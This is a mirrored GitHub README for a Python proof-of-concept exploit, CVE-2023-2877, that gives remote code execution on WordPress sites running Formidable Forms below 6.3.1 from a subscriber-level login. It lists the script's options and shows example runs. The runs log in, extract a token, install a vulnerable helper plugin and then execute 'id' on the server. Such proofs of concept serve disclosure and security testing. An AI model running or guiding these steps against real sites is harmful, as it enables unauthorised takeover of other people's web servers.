Giters

RandomRobbieBF / CVE-2023-2877

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-2877

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

Usage

usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value

Example

$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.

$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]

Warning

YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got not authentication!

About

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

License:Apache License 2.0

Languages

Language:Python 100.0%